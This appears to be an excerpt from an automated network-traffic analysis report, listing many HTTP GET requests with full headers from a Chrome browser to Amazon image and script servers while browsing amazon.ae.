    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41xkTNTvpwL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41gRz4miKkL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31Id2i6D-rL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31EO3Wv+aeL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31+4pNVeyCL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/416xoG90KZL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41Qtra7lf+L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31nHAvUNnpL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51vSWnZJsfL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31OXYlKv9gL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41MgROdin7L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
